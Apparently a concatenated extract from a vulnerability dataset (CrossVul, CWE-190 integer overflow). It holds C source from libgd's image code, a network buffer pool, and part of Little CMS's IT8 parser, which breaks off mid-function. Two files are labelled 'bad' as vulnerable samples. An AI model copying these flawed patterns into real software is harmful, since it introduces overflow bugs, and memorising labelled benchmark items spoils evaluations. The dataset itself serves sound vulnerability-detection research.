+ gdTrueColorGetGreen(dst) * dst_weight) / tot_weight;
blue = (gdTrueColorGetBlue(src) * src_weight
+ gdTrueColorGetBlue(dst) * dst_weight) / tot_weight;
/* -------------------------------------------------------------------- */
/* Return merged result. */
/* -------------------------------------------------------------------- */
return ((alpha << 24) + (red << 16) + (green << 8) + blue);
}
void gdImageAlphaBlending (gdImagePtr im, int alphaBlendingArg)
{
im->alphaBlendingFlag = alphaBlendingArg;
}
void gdImageAntialias (gdImagePtr im, int antialias)
{
if (im->trueColor){
im->antialias = antialias;
}
}
void gdImageSaveAlpha (gdImagePtr im, int saveAlphaArg)
{
im->saveAlphaFlag = saveAlphaArg;
}
static int gdLayerOverlay (int dst, int src)
{
int a1, a2;
a1 = gdAlphaMax - gdTrueColorGetAlpha(dst);
a2 = gdAlphaMax - gdTrueColorGetAlpha(src);
return ( ((gdAlphaMax - a1*a2/gdAlphaMax) << 24) +
(gdAlphaOverlayColor( gdTrueColorGetRed(src), gdTrueColorGetRed(dst), gdRedMax ) << 16) +
(gdAlphaOverlayColor( gdTrueColorGetGreen(src), gdTrueColorGetGreen(dst), gdGreenMax ) << 8) +
(gdAlphaOverlayColor( gdTrueColorGetBlue(src), gdTrueColorGetBlue(dst), gdBlueMax ))
);
}
static int gdAlphaOverlayColor (int src, int dst, int max )
{
/* this function implements the overlay algorithm
*
* for dst[rgb] <= 0.5,
* c[rgb] = 2 * src[rgb] * dst[rgb]
* and for dst[rgb] > 0.5,
* c[rgb] = 2 * src[rgb] + 2 * dst[rgb] - 2 * src[rgb] * dst[rgb] - 1
*
*/
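/* Worked example (illustrative, max == 255):
* src == 200, dst == 100: 2*dst == 200 <= 255, "dark" zone -> 200 * 200 / 255 == 156
* src == 200, dst == 180: 2*dst == 360 > 255, "light" zone -> 360 + 400 - 282 - 255 == 223
*/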
dst = dst << 1;
if( dst > max ) {
/* in the "light" zone */
return dst + (src << 1) - (dst * src / max) - max;
} else {
/* in the "dark" zone */
return dst * src / max;
}
}
void gdImageSetClip (gdImagePtr im, int x1, int y1, int x2, int y2)
{
if (x1 < 0) {
x1 = 0;
}
if (x1 >= im->sx) {
x1 = im->sx - 1;
}
if (x2 < 0) {
x2 = 0;
}
if (x2 >= im->sx) {
x2 = im->sx - 1;
}
if (y1 < 0) {
y1 = 0;
}
if (y1 >= im->sy) {
y1 = im->sy - 1;
}
if (y2 < 0) {
y2 = 0;
}
if (y2 >= im->sy) {
y2 = im->sy - 1;
}
im->cx1 = x1;
im->cy1 = y1;
im->cx2 = x2;
im->cy2 = y2;
}
void gdImageGetClip (gdImagePtr im, int *x1P, int *y1P, int *x2P, int *y2P)
{
*x1P = im->cx1;
*y1P = im->cy1;
*x2P = im->cx2;
*y2P = im->cy2;
}
/* convert a palette image to true color */
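/* Overview of the conversion below: a truecolor row is allocated per scanline, each
* palette index is expanded through the red/green/blue/alpha tables (the transparent
* index becomes a fully transparent pixel), and the old palette rows are then released.
* Returns 1 on success, 0 on a NULL image or allocation failure. */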
int gdImagePaletteToTrueColor(gdImagePtr src)
{
unsigned int y;
unsigned int yy;
if (src == NULL) {
return 0;
}
if (src->trueColor == 1) {
return 1;
} else {
unsigned int x;
const unsigned int sy = gdImageSY(src);
const unsigned int sx = gdImageSX(src);
src->tpixels = (int **) gdMalloc(sizeof(int *) * sy);
if (src->tpixels == NULL) {
return 0;
}
for (y = 0; y < sy; y++) {
const unsigned char *src_row = src->pixels[y];
int * dst_row;
/* no need to calloc it, we overwrite all pixels anyway */
src->tpixels[y] = (int *) gdMalloc(sx * sizeof(int));
if (src->tpixels[y] == NULL) {
goto clean_on_error;
}
dst_row = src->tpixels[y];
for (x = 0; x < sx; x++) {
const unsigned char c = *(src_row + x);
if (c == src->transparent) {
*(dst_row + x) = gdTrueColorAlpha(0, 0, 0, 127);
} else {
*(dst_row + x) = gdTrueColorAlpha(src->red[c], src->green[c], src->blue[c], src->alpha[c]);
}
}
}
}
/* free old palette buffer (y is sy) */
for (yy = 0; yy < y; yy++) {
gdFree(src->pixels[yy]);
}
gdFree(src->pixels);
src->trueColor = 1;
src->pixels = NULL;
src->alphaBlendingFlag = 0;
src->saveAlphaFlag = 1;
if (src->transparent >= 0) {
const unsigned char c = src->transparent;
src->transparent = gdTrueColorAlpha(src->red[c], src->green[c], src->blue[c], src->alpha[c]);
}
return 1;
clean_on_error:
if (y > 0) {
/* free only the rows converted so far; row y itself failed to allocate */
for (yy = 0; yy < y; yy++) {
gdFree(src->tpixels[yy]);
}
}
gdFree(src->tpixels);
return 0;
}
| ./CrossVul/dataset_final_sorted/CWE-190/c/bad_5167_1 |
crossvul-cpp_data_good_401_0 | /*
* Description: network buf manager
* History: yang@haipo.me, 2016/03/16, create
*/
# include <errno.h>
# include <string.h>
# include "nw_buf.h"
# define NW_BUF_POOL_INIT_SIZE 64
# define NW_BUF_POOL_MAX_SIZE 65535
# define NW_CACHE_INIT_SIZE 64
# define NW_CACHE_MAX_SIZE 65535
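/* An nw_buf is a fixed-size byte buffer with a read cursor (rpos) and a write cursor
* (wpos); 0 <= rpos <= wpos <= size always holds, so nw_buf_size() is the number of
* pending bytes and nw_buf_avail() the remaining free space. */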
size_t nw_buf_size(nw_buf *buf)
{
return buf->wpos - buf->rpos;
}
size_t nw_buf_avail(nw_buf *buf)
{
return buf->size - buf->wpos;
}
size_t nw_buf_write(nw_buf *buf, const void *data, size_t len)
{
size_t available = buf->size - buf->wpos;
size_t wlen = len > available ? available : len;
memcpy(buf->data + buf->wpos, data, wlen);
buf->wpos += wlen;
return wlen;
}
void nw_buf_shift(nw_buf *buf)
{
if (buf->rpos == buf->wpos) {
buf->rpos = buf->wpos = 0;
} else if (buf->rpos != 0) {
memmove(buf->data, buf->data + buf->rpos, buf->wpos - buf->rpos);
buf->wpos -= buf->rpos;
buf->rpos = 0;
}
}
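/* Usage sketch (illustrative): for a buf with size 8, rpos 3 and wpos 6,
* nw_buf_size() == 3 and nw_buf_avail() == 2; nw_buf_shift() then moves the three
* pending bytes to the front, leaving rpos == 0 and wpos == 3. */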
nw_buf_pool *nw_buf_pool_create(uint32_t size)
{
nw_buf_pool *pool = malloc(sizeof(nw_buf_pool));
if (pool == NULL)
return NULL;
pool->size = size;
pool->used = 0;
pool->free = 0;
pool->free_total = NW_BUF_POOL_INIT_SIZE;
pool->free_arr = malloc(pool->free_total * sizeof(nw_buf *));
if (pool->free_arr == NULL) {
free(pool);
return NULL;
}
return pool;
}
nw_buf *nw_buf_alloc(nw_buf_pool *pool)
{
if (pool->free) {
nw_buf *buf = pool->free_arr[--pool->free];
buf->size = pool->size;
buf->rpos = 0;
buf->wpos = 0;
buf->next = NULL;
return buf;
}
nw_buf *buf = malloc(sizeof(nw_buf) + pool->size);
if (buf == NULL)
return NULL;
buf->size = pool->size;
buf->rpos = 0;
buf->wpos = 0;
buf->next = NULL;
return buf;
}
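/* Return a buffer to the pool's free list for reuse; the list grows by doubling
* (capped at NW_BUF_POOL_MAX_SIZE entries), beyond which surplus buffers are freed. */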
void nw_buf_free(nw_buf_pool *pool, nw_buf *buf)
{
if (pool->free < pool->free_total) {
pool->free_arr[pool->free++] = buf;
} else if (pool->free_total < NW_BUF_POOL_MAX_SIZE) {
uint32_t new_free_total = pool->free_total * 2;
void *new_arr = realloc(pool->free_arr, new_free_total * sizeof(nw_buf *));
if (new_arr) {
pool->free_total = new_free_total;
pool->free_arr = new_arr;
pool->free_arr[pool->free++] = buf;
} else {
free(buf);
}
} else {
free(buf);
}
}
void nw_buf_pool_release(nw_buf_pool *pool)
{
for (uint32_t i = 0; i < pool->free; ++i) {
free(pool->free_arr[i]);
}
free(pool->free_arr);
free(pool);
}
nw_buf_list *nw_buf_list_create(nw_buf_pool *pool, uint32_t limit)
{
nw_buf_list *list = malloc(sizeof(nw_buf_list));
if (list == NULL)
return NULL;
list->pool = pool;
list->count = 0;
list->limit = limit;
list->head = NULL;
list->tail = NULL;
return list;
}
size_t nw_buf_list_write(nw_buf_list *list, const void *data, size_t len)
{
const void *pos = data;
size_t left = len;
if (list->tail && nw_buf_avail(list->tail)) {
size_t ret = nw_buf_write(list->tail, pos, left);
left -= ret;
pos += ret;
}
while (left) {
if (list->limit && list->count >= list->limit)
return len - left;
nw_buf *buf = nw_buf_alloc(list->pool);
if (buf == NULL)
return len - left;
if (list->head == NULL)
list->head = buf;
if (list->tail != NULL)
list->tail->next = buf;
list->tail = buf;
list->count++;
size_t ret = nw_buf_write(list->tail, pos, left);
left -= ret;
pos += ret;
}
return len;
}
size_t nw_buf_list_append(nw_buf_list *list, const void *data, size_t len)
{
if (list->limit && list->count >= list->limit)
return 0;
nw_buf *buf = nw_buf_alloc(list->pool);
if (buf == NULL)
return 0;
if (len > buf->size) {
nw_buf_free(list->pool, buf);
return 0;
}
nw_buf_write(buf, data, len);
if (list->head == NULL)
list->head = buf;
if (list->tail != NULL)
list->tail->next = buf;
list->tail = buf;
list->count++;
return len;
}
void nw_buf_list_shift(nw_buf_list *list)
{
if (list->head) {
nw_buf *tmp = list->head;
list->head = tmp->next;
if (list->head == NULL) {
list->tail = NULL;
}
list->count--;
nw_buf_free(list->pool, tmp);
}
}
void nw_buf_list_release(nw_buf_list *list)
{
nw_buf *curr = list->head;
nw_buf *next = NULL;
while (curr) {
next = curr->next;
nw_buf_free(list->pool, curr);
curr = next;
}
free(list);
}
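/* nw_cache applies the same free-list idea to fixed-size objects: nw_cache_alloc pops
* a recycled object when one is available and otherwise falls back to a plain malloc
* of cache->size bytes. */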
nw_cache *nw_cache_create(uint32_t size)
{
nw_cache *cache = malloc(sizeof(nw_cache));
if (cache == NULL)
return NULL;
cache->size = size;
cache->used = 0;
cache->free = 0;
cache->free_total = NW_CACHE_INIT_SIZE;
cache->free_arr = malloc(cache->free_total * sizeof(void *));
if (cache->free_arr == NULL) {
free(cache);
return NULL;
}
return cache;
}
void *nw_cache_alloc(nw_cache *cache)
{
if (cache->free)
return cache->free_arr[--cache->free];
return malloc(cache->size);
}
void nw_cache_free(nw_cache *cache, void *obj)
{
if (cache->free < cache->free_total) {
cache->free_arr[cache->free++] = obj;
} else if (cache->free_total < NW_CACHE_MAX_SIZE) {
uint32_t new_free_total = cache->free_total * 2;
void *new_arr = realloc(cache->free_arr, new_free_total * sizeof(void *));
if (new_arr) {
cache->free_total = new_free_total;
cache->free_arr = new_arr;
cache->free_arr[cache->free++] = obj;
} else {
free(obj);
}
} else {
free(obj);
}
}
void nw_cache_release(nw_cache *cache)
{
for (uint32_t i = 0; i < cache->free; ++i) {
free(cache->free_arr[i]);
}
free(cache->free_arr);
free(cache);
}
| ./CrossVul/dataset_final_sorted/CWE-190/c/good_401_0 |
crossvul-cpp_data_bad_352_9 | //---------------------------------------------------------------------------------
//
// Little Color Management System
// Copyright (c) 1998-2017 Marti Maria Saguer
//
// Permission is hereby granted, free of charge, to any person obtaining
// a copy of this software and associated documentation files (the "Software"),
// to deal in the Software without restriction, including without limitation
// the rights to use, copy, modify, merge, publish, distribute, sublicense,
// and/or sell copies of the Software, and to permit persons to whom the Software
// is furnished to do so, subject to the following conditions:
//
// The above copyright notice and this permission notice shall be included in
// all copies or substantial portions of the Software.
//
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
// EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
// THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
// NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
// LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
// OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
// WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
//
//---------------------------------------------------------------------------------
//
#include "lcms2_internal.h"
// IT8.7 / CGATS.17-200x handling -----------------------------------------------------------------------------
#define MAXID 128 // Max length of identifier
#define MAXSTR 1024 // Max length of string
#define MAXTABLES 255 // Max Number of tables in a single stream
#define MAXINCLUDE 20 // Max number of nested includes
#define DEFAULT_DBL_FORMAT "%.10g" // Double formatting
#ifdef CMS_IS_WINDOWS_
# include <io.h>
# define DIR_CHAR '\\'
#else
# define DIR_CHAR '/'
#endif
// Symbols
typedef enum {
SUNDEFINED,
SINUM, // Integer
SDNUM, // Real
SIDENT, // Identifier
SSTRING, // string
SCOMMENT, // comment
SEOLN, // End of line
SEOF, // End of stream
SSYNERROR, // Syntax error found on stream
// Keywords
SBEGIN_DATA,
SBEGIN_DATA_FORMAT,
SEND_DATA,
SEND_DATA_FORMAT,
SKEYWORD,
SDATA_FORMAT_ID,
SINCLUDE
} SYMBOL;
// How to write the value
typedef enum {
WRITE_UNCOOKED,
WRITE_STRINGIFY,
WRITE_HEXADECIMAL,
WRITE_BINARY,
WRITE_PAIR
} WRITEMODE;
// Linked list of variable names
typedef struct _KeyVal {
struct _KeyVal* Next;
char* Keyword; // Name of variable
struct _KeyVal* NextSubkey; // If key is a dictionary, points to the next item
char* Subkey; // If key is a dictionary, points to the subkey name
char* Value; // Points to value
WRITEMODE WriteAs; // How to write the value
} KEYVALUE;
// Linked list of memory chunks (Memory sink)
typedef struct _OwnedMem {
struct _OwnedMem* Next;
void * Ptr; // Point to value
} OWNEDMEM;
// Suballocator
typedef struct _SubAllocator {
cmsUInt8Number* Block;
cmsUInt32Number BlockSize;
cmsUInt32Number Used;
} SUBALLOCATOR;
// Table. Each individual table can hold properties and rows & cols
typedef struct _Table {
char SheetType[MAXSTR]; // The first row of the IT8 (the type)
int nSamples, nPatches; // Cols, Rows
int SampleID; // Pos of ID
KEYVALUE* HeaderList; // The properties
char** DataFormat; // The binary stream descriptor
char** Data; // The binary stream
} TABLE;
// File stream being parsed
typedef struct _FileContext {
char FileName[cmsMAX_PATH]; // File name if being read from file
FILE* Stream; // File stream or NULL if held in memory
} FILECTX;
// This struct hold all information about an open IT8 handler.
typedef struct {
cmsUInt32Number TablesCount; // How many tables in this stream
cmsUInt32Number nTable; // The actual table
TABLE Tab[MAXTABLES];
// Memory management
OWNEDMEM* MemorySink; // The storage backend
SUBALLOCATOR Allocator; // String suballocator -- just to keep it fast
// Parser state machine
SYMBOL sy; // Current symbol
int ch; // Current character
cmsInt32Number inum; // integer value
cmsFloat64Number dnum; // real value
char id[MAXID]; // identifier
char str[MAXSTR]; // string
// Allowed keywords & datasets. They have visibility on whole stream
KEYVALUE* ValidKeywords;
KEYVALUE* ValidSampleID;
char* Source; // Points to loc. being parsed
cmsInt32Number lineno; // line counter for error reporting
FILECTX* FileStack[MAXINCLUDE]; // Stack of files being parsed
cmsInt32Number IncludeSP; // Include Stack Pointer
char* MemoryBlock; // The stream if held in memory
char DoubleFormatter[MAXID];// Printf-like 'cmsFloat64Number' formatter
cmsContext ContextID; // The threading context
} cmsIT8;
// The stream for save operations
typedef struct {
FILE* stream; // For save-to-file behaviour
cmsUInt8Number* Base;
cmsUInt8Number* Ptr; // For save-to-mem behaviour
cmsUInt32Number Used;
cmsUInt32Number Max;
} SAVESTREAM;
// ------------------------------------------------------ cmsIT8 parsing routines
// A keyword
typedef struct {
const char *id;
SYMBOL sy;
} KEYWORD;
// The keyword->symbol translation table. Sorting is required.
static const KEYWORD TabKeys[] = {
{"$INCLUDE", SINCLUDE}, // This is an extension!
{".INCLUDE", SINCLUDE}, // This is an extension!
{"BEGIN_DATA", SBEGIN_DATA },
{"BEGIN_DATA_FORMAT", SBEGIN_DATA_FORMAT },
{"DATA_FORMAT_IDENTIFIER", SDATA_FORMAT_ID},
{"END_DATA", SEND_DATA},
{"END_DATA_FORMAT", SEND_DATA_FORMAT},
{"KEYWORD", SKEYWORD}
};
#define NUMKEYS (sizeof(TabKeys)/sizeof(KEYWORD))
// Predefined properties
// A property
typedef struct {
const char *id; // The identifier
WRITEMODE as; // How is supposed to be written
} PROPERTY;
static PROPERTY PredefinedProperties[] = {
{"NUMBER_OF_FIELDS", WRITE_UNCOOKED}, // Required - NUMBER OF FIELDS
{"NUMBER_OF_SETS", WRITE_UNCOOKED}, // Required - NUMBER OF SETS
{"ORIGINATOR", WRITE_STRINGIFY}, // Required - Identifies the specific system, organization or individual that created the data file.
{"FILE_DESCRIPTOR", WRITE_STRINGIFY}, // Required - Describes the purpose or contents of the data file.
{"CREATED", WRITE_STRINGIFY}, // Required - Indicates date of creation of the data file.
{"DESCRIPTOR", WRITE_STRINGIFY}, // Required - Describes the purpose or contents of the data file.
{"DIFFUSE_GEOMETRY", WRITE_STRINGIFY}, // The diffuse geometry used. Allowed values are "sphere" or "opal".
{"MANUFACTURER", WRITE_STRINGIFY},
{"MANUFACTURE", WRITE_STRINGIFY}, // Some broken Fuji targets does store this value
{"PROD_DATE", WRITE_STRINGIFY}, // Identifies year and month of production of the target in the form yyyy:mm.
{"SERIAL", WRITE_STRINGIFY}, // Uniquely identifies individual physical target.
{"MATERIAL", WRITE_STRINGIFY}, // Identifies the material on which the target was produced using a code
// uniquely identifying the material. This is intended to be used for IT8.7
// physical targets only (i.e. IT8.7/1 and IT8.7/2).
{"INSTRUMENTATION", WRITE_STRINGIFY}, // Used to report the specific instrumentation used (manufacturer and
// model number) to generate the data reported. This data will often
// provide more information about the particular data collected than an
// extensive list of specific details. This is particularly important for
// spectral data or data derived from spectrophotometry.
{"MEASUREMENT_SOURCE", WRITE_STRINGIFY}, // Illumination used for spectral measurements. This data helps provide
// a guide to the potential for issues of paper fluorescence, etc.
{"PRINT_CONDITIONS", WRITE_STRINGIFY}, // Used to define the characteristics of the printed sheet being reported.
// Where standard conditions have been defined (e.g., SWOP at nominal)
// named conditions may suffice. Otherwise, detailed information is
// needed.
{"SAMPLE_BACKING", WRITE_STRINGIFY}, // Identifies the backing material used behind the sample during
// measurement. Allowed values are "black", "white", or "na".
{"CHISQ_DOF", WRITE_STRINGIFY}, // Degrees of freedom associated with the Chi squared statistic
// below properties are new in recent specs:
{"MEASUREMENT_GEOMETRY", WRITE_STRINGIFY}, // The type of measurement, either reflection or transmission, should be indicated
// along with details of the geometry and the aperture size and shape. For example,
// for transmission measurements it is important to identify 0/diffuse, diffuse/0,
// opal or integrating sphere, etc. For reflection it is important to identify 0/45,
// 45/0, sphere (specular included or excluded), etc.
{"FILTER", WRITE_STRINGIFY}, // Identifies the use of physical filter(s) during measurement. Typically used to
// denote the use of filters such as none, D65, Red, Green or Blue.
{"POLARIZATION", WRITE_STRINGIFY}, // Identifies the use of a physical polarization filter during measurement. Allowed
// values are "yes", "white", "none" or "na".
{"WEIGHTING_FUNCTION", WRITE_PAIR}, // Indicates such functions as: the CIE standard observer functions used in the
// calculation of various data parameters (2 degree and 10 degree), CIE standard
// illuminant functions used in the calculation of various data parameters (e.g., D50,
// D65, etc.), density status response, etc. If used there shall be at least one
// name-value pair following the WEIGHTING_FUNCTION tag/keyword. The first attribute
// in the set shall be "name" and shall identify the particular parameter used.
// The second shall be "value" and shall provide the value associated with that name.
// For ASCII data, a string containing the Name and Value attribute pairs shall follow
// the weighting function keyword. A semi-colon separates attribute pairs from each
// other and within the attribute the name and value are separated by a comma.
{"COMPUTATIONAL_PARAMETER", WRITE_PAIR}, // Parameter that is used in computing a value from measured data. Name is the name
// of the calculation, parameter is the name of the parameter used in the calculation
// and value is the value of the parameter.
{"TARGET_TYPE", WRITE_STRINGIFY}, // The type of target being measured, e.g. IT8.7/1, IT8.7/3, user defined, etc.
{"COLORANT", WRITE_STRINGIFY}, // Identifies the colorant(s) used in creating the target.
{"TABLE_DESCRIPTOR", WRITE_STRINGIFY}, // Describes the purpose or contents of a data table.
{"TABLE_NAME", WRITE_STRINGIFY} // Provides a short name for a data table.
};
#define NUMPREDEFINEDPROPS (sizeof(PredefinedProperties)/sizeof(PROPERTY))
// Predefined sample types on dataset
static const char* PredefinedSampleID[] = {
"SAMPLE_ID", // Identifies sample that data represents
"STRING", // Identifies label, or other non-machine readable value.
// Value must begin and end with a " symbol
"CMYK_C", // Cyan component of CMYK data expressed as a percentage
"CMYK_M", // Magenta component of CMYK data expressed as a percentage
"CMYK_Y", // Yellow component of CMYK data expressed as a percentage
"CMYK_K", // Black component of CMYK data expressed as a percentage
"D_RED", // Red filter density
"D_GREEN", // Green filter density
"D_BLUE", // Blue filter density
"D_VIS", // Visual filter density
"D_MAJOR_FILTER", // Major filter d ensity
"RGB_R", // Red component of RGB data
"RGB_G", // Green component of RGB data
"RGB_B", // Blue com ponent of RGB data
"SPECTRAL_NM", // Wavelength of measurement expressed in nanometers
"SPECTRAL_PCT", // Percentage reflectance/transmittance
"SPECTRAL_DEC", // Reflectance/transmittance
"XYZ_X", // X component of tristimulus data
"XYZ_Y", // Y component of tristimulus data
"XYZ_Z", // Z component of tristimulus data
"XYY_X", // x component of chromaticity data
"XYY_Y", // y component of chromaticity data
"XYY_CAPY", // Y component of tristimulus data
"LAB_L", // L* component of Lab data
"LAB_A", // a* component of Lab data
"LAB_B", // b* component of Lab data
"LAB_C", // C*ab component of Lab data
"LAB_H", // hab component of Lab data
"LAB_DE", // CIE dE
"LAB_DE_94", // CIE dE using CIE 94
"LAB_DE_CMC", // dE using CMC
"LAB_DE_2000", // CIE dE using CIE DE 2000
"MEAN_DE", // Mean Delta E (LAB_DE) of samples compared to batch average
// (Used for data files for ANSI IT8.7/1 and IT8.7/2 targets)
"STDEV_X", // Standard deviation of X (tristimulus data)
"STDEV_Y", // Standard deviation of Y (tristimulus data)
"STDEV_Z", // Standard deviation of Z (tristimulus data)
"STDEV_L", // Standard deviation of L*
"STDEV_A", // Standard deviation of a*
"STDEV_B", // Standard deviation of b*
"STDEV_DE", // Standard deviation of CIE dE
"CHI_SQD_PAR"}; // The average of the standard deviations of L*, a* and b*. It is
// used to derive an estimate of the chi-squared parameter which is
// recommended as the predictor of the variability of dE
#define NUMPREDEFINEDSAMPLEID (sizeof(PredefinedSampleID)/sizeof(char *))
//Forward declaration of some internal functions
static void* AllocChunk(cmsIT8* it8, cmsUInt32Number size);
// Checks whether c is a separator
static
cmsBool isseparator(int c)
{
return (c == ' ') || (c == '\t') ;
}
// Checks whether c is a valid identifier char
static
cmsBool ismiddle(int c)
{
return (!isseparator(c) && (c != '#') && (c !='\"') && (c != '\'') && (c > 32) && (c < 127));
}
// Checks whether c is a valid identifier middle char.
static
cmsBool isidchar(int c)
{
return isalnum(c) || ismiddle(c);
}
// Checks whether c is a valid identifier first char.
static
cmsBool isfirstidchar(int c)
{
return !isdigit(c) && ismiddle(c);
}
// Guess whether the supplied path looks like an absolute path
static
cmsBool isabsolutepath(const char *path)
{
char ThreeChars[4];
if(path == NULL)
return FALSE;
if (path[0] == 0)
return FALSE;
strncpy(ThreeChars, path, 3);
ThreeChars[3] = 0;
if(ThreeChars[0] == DIR_CHAR)
return TRUE;
#ifdef CMS_IS_WINDOWS_
if (isalpha((int) ThreeChars[0]) && ThreeChars[1] == ':')
return TRUE;
#endif
return FALSE;
}
// Makes a file path based on a given reference path
// NOTE: this function doesn't check if the path exists or even if it's legal
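// Example (illustrative, non-Windows builds where DIR_CHAR is '/'): basePath "targets/master.it8"
// plus relPath "chart.inc" yields "targets/chart.inc"; an absolute relPath is copied as-is.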
static
cmsBool BuildAbsolutePath(const char *relPath, const char *basePath, char *buffer, cmsUInt32Number MaxLen)
{
char *tail;
cmsUInt32Number len;
// Already absolute?
if (isabsolutepath(relPath)) {
strncpy(buffer, relPath, MaxLen);
buffer[MaxLen-1] = 0;
return TRUE;
}
// No, search for last
strncpy(buffer, basePath, MaxLen);
buffer[MaxLen-1] = 0;
tail = strrchr(buffer, DIR_CHAR);
if (tail == NULL) return FALSE; // Is not absolute and has no separators??
len = (cmsUInt32Number) (tail - buffer);
if (len >= MaxLen) return FALSE;
// No need to assure zero terminator over here
strncpy(tail + 1, relPath, MaxLen - len);
return TRUE;
}
// Make sure no exploit is being even tried
static
const char* NoMeta(const char* str)
{
if (strchr(str, '%') != NULL)
return "**** CORRUPTED FORMAT STRING ***";
return str;
}
// Syntax error
static
cmsBool SynError(cmsIT8* it8, const char *Txt, ...)
{
char Buffer[256], ErrMsg[1024];
va_list args;
va_start(args, Txt);
vsnprintf(Buffer, 255, Txt, args);
Buffer[255] = 0;
va_end(args);
snprintf(ErrMsg, 1023, "%s: Line %d, %s", it8->FileStack[it8 ->IncludeSP]->FileName, it8->lineno, Buffer);
ErrMsg[1023] = 0;
it8->sy = SSYNERROR;
cmsSignalError(it8 ->ContextID, cmsERROR_CORRUPTION_DETECTED, "%s", ErrMsg);
return FALSE;
}
// Check if current symbol is same as specified. Issue an error otherwise.
static
cmsBool Check(cmsIT8* it8, SYMBOL sy, const char* Err)
{
if (it8 -> sy != sy)
return SynError(it8, NoMeta(Err));
return TRUE;
}
// Read Next character from stream
static
void NextCh(cmsIT8* it8)
{
if (it8 -> FileStack[it8 ->IncludeSP]->Stream) {
it8 ->ch = fgetc(it8 ->FileStack[it8 ->IncludeSP]->Stream);
if (feof(it8 -> FileStack[it8 ->IncludeSP]->Stream)) {
if (it8 ->IncludeSP > 0) {
fclose(it8 ->FileStack[it8->IncludeSP--]->Stream);
it8 -> ch = ' '; // Whitespace to be ignored
} else
it8 ->ch = 0; // EOF
}
}
else {
it8->ch = *it8->Source;
if (it8->ch) it8->Source++;
}
}
// Try to see if current identifier is a keyword, if so return the referred symbol
static
SYMBOL BinSrchKey(const char *id)
{
int l = 1;
int r = NUMKEYS;
int x, res;
while (r >= l)
{
x = (l+r)/2;
res = cmsstrcasecmp(id, TabKeys[x-1].id);
if (res == 0) return TabKeys[x-1].sy;
if (res < 0) r = x - 1;
else l = x + 1;
}
return SUNDEFINED;
}
// 10 ^n
static
cmsFloat64Number xpow10(int n)
{
return pow(10, (cmsFloat64Number) n);
}
// Reads a real number, continuing on from an already-parsed integer part
static
void ReadReal(cmsIT8* it8, cmsInt32Number inum)
{
it8->dnum = (cmsFloat64Number)inum;
while (isdigit(it8->ch)) {
it8->dnum = (cmsFloat64Number)it8->dnum * 10.0 + (cmsFloat64Number)(it8->ch - '0');
NextCh(it8);
}
if (it8->ch == '.') { // Decimal point
cmsFloat64Number frac = 0.0; // fraction
int prec = 0; // precision
NextCh(it8); // Eats dec. point
while (isdigit(it8->ch)) {
frac = frac * 10.0 + (cmsFloat64Number)(it8->ch - '0');
prec++;
NextCh(it8);
}
it8->dnum = it8->dnum + (frac / xpow10(prec));
}
// Exponent, example 34.00E+20
if (toupper(it8->ch) == 'E') {
cmsInt32Number e;
cmsInt32Number sgn;
NextCh(it8); sgn = 1;
if (it8->ch == '-') {
sgn = -1; NextCh(it8);
}
else
if (it8->ch == '+') {
sgn = +1;
NextCh(it8);
}
e = 0;
while (isdigit(it8->ch)) {
cmsInt32Number digit = (it8->ch - '0');
if ((cmsFloat64Number)e * 10.0 + (cmsFloat64Number)digit < (cmsFloat64Number)+2147483647.0)
e = e * 10 + digit;
NextCh(it8);
}
e = sgn*e;
it8->dnum = it8->dnum * xpow10(e);
}
}
// Parses a float number
// This cannot call atof() directly because atof() uses locale-dependent
// parsing, while CCMX files always use . as decimal separator
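// Example (illustrative): ParseFloatNumber("-3.25E+2") returns -325.0 in any locale.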
static
cmsFloat64Number ParseFloatNumber(const char *Buffer)
{
cmsFloat64Number dnum = 0.0;
int sign = 1;
// keep safe
if (Buffer == NULL) return 0.0;
if (*Buffer == '-' || *Buffer == '+') {
sign = (*Buffer == '-') ? -1 : 1;
Buffer++;
}
while (*Buffer && isdigit((int)*Buffer)) {
dnum = dnum * 10.0 + (*Buffer - '0');
if (*Buffer) Buffer++;
}
if (*Buffer == '.') {
cmsFloat64Number frac = 0.0; // fraction
int prec = 0; // precision
if (*Buffer) Buffer++;
while (*Buffer && isdigit((int)*Buffer)) {
frac = frac * 10.0 + (*Buffer - '0');
prec++;
if (*Buffer) Buffer++;
}
dnum = dnum + (frac / xpow10(prec));
}
// Exponent, example 34.00E+20
if (*Buffer && toupper(*Buffer) == 'E') {
int e;
int sgn;
if (*Buffer) Buffer++;
sgn = 1;
if (*Buffer == '-') {
sgn = -1;
if (*Buffer) Buffer++;
}
else
if (*Buffer == '+') {
sgn = +1;
if (*Buffer) Buffer++;
}
e = 0;
while (*Buffer && isdigit((int)*Buffer)) {
cmsInt32Number digit = (*Buffer - '0');
if ((cmsFloat64Number)e * 10.0 + digit < (cmsFloat64Number)+2147483647.0)
e = e * 10 + digit;
if (*Buffer) Buffer++;
}
e = sgn*e;
dnum = dnum * xpow10(e);
}
return sign * dnum;
}
// Reads next symbol
static
void InSymbol(cmsIT8* it8)
{
register char *idptr;
register int k;
SYMBOL key;
int sng;
do {
while (isseparator(it8->ch))
NextCh(it8);
if (isfirstidchar(it8->ch)) { // Identifier
k = 0;
idptr = it8->id;
do {
if (++k < MAXID) *idptr++ = (char) it8->ch;
NextCh(it8);
} while (isidchar(it8->ch));
*idptr = '\0';
key = BinSrchKey(it8->id);
if (key == SUNDEFINED) it8->sy = SIDENT;
else it8->sy = key;
}
else // Is a number?
if (isdigit(it8->ch) || it8->ch == '.' || it8->ch == '-' || it8->ch == '+')
{
int sign = 1;
if (it8->ch == '-') {
sign = -1;
NextCh(it8);
}
it8->inum = 0;
it8->sy = SINUM;
if (it8->ch == '0') { // 0xnnnn (Hexa) or 0bnnnn (Binary)
NextCh(it8);
if (toupper(it8->ch) == 'X') {
int j;
NextCh(it8);
while (isxdigit(it8->ch))
{
it8->ch = toupper(it8->ch);
if (it8->ch >= 'A' && it8->ch <= 'F') j = it8->ch -'A'+10;
else j = it8->ch - '0';
if ((cmsFloat64Number) it8->inum * 16.0 + (cmsFloat64Number) j > (cmsFloat64Number)+2147483647.0)
{
SynError(it8, "Invalid hexadecimal number");
return;
